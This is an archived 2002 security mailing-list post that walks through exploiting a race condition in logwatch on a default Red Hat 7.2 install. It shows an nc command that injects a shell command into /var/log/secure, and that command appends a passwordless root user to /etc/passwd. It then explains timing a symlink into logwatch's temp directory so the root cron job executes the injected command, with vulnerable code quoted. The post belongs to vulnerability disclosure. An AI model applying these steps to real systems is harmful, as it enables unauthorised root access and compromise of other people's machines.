|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: ano nym (an0nym0uz
dbzmail.com)Date: Sun Apr 07 2002 - 21:50:25 CDT
Here are some of my ideas about exploiting the race condition in logwatch.
logwatch is processing different logfiles - let's take a look at
/var/log/secure. First we need a way to smuggle in a command in it; this is
how I did it:
$ nc 0 22
SSH-1.99-OpenSSH_2.9p2
'& echo hoho::0:0:>>/etc/passwd #
Protocol mismatch.
$ tail -f /var/log/secure
Apr 8 04:37:33 xxxxx sshd[23420]: Bad protocol version identification ''& echo hoho::0:0:>>/etc/passwd #' from 127.0.0.1
Ok, now we got a the command we want, how are we going to get this
executed?
----- This is what logwatch does.
Preprocessing LogFile: secure
/bin/cat /var/log/secure 2>/dev/null | /etc/log.d/scripts/shared/applystddate >/tmp/logwatch.2318/secure
DEBUG: Inside ApplyStdDate...
DEBUG: Range: yesterday
DEBUG: Looking For: Apr 6
(the command string should be inserted the day BEFORE, if range is yesteday...)
So, if we create a symlink...
ln -s /etc/log.d/scripts/shared/applystddate secure, for example,
the command will get executed when logwatch calls applystddate next time.
(many other targets exist, for example /root/.bashrc etc...)
We can of course use other logs than secure; for example "messages" and
smuggle in the command using the ftpd etc...
So, what are the problems?:
[code from logwatch]
$TempDir = $Config{'tmpdir'} . "logwatch." . $$ . "/";
if ( -d $TempDir ) {
rmdir ($TempDir);
}
if ( -e $TempDir ) {
unlink ($TempDir);
}
#### 1
if ($Config{'debug'}>7) {
print "\nMaking Temp Dir: " . $TempDir . "\n";
}
mkdir ($TempDir,0700);
[code from logwatch]
We need to create a the dir logwatch.PID BEFORE "mkdir ($TempDir,0700);"
and after/before #### 1. If not we will not be able to create a symlink inside
the dir (0700)...
Another nice thing is that we can see when logwatch will be executed,
by looking at /etc/crontab - logwatch is in the dir /etc/cron.daily...
(02 4 * * * root run-parts /etc/cron.daily)
Note, that the system I played with was a DEFAULT installation of
redhat 7.2.
later.
--Get your free email from www.dbzmail.com
Powered by Outblaze
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]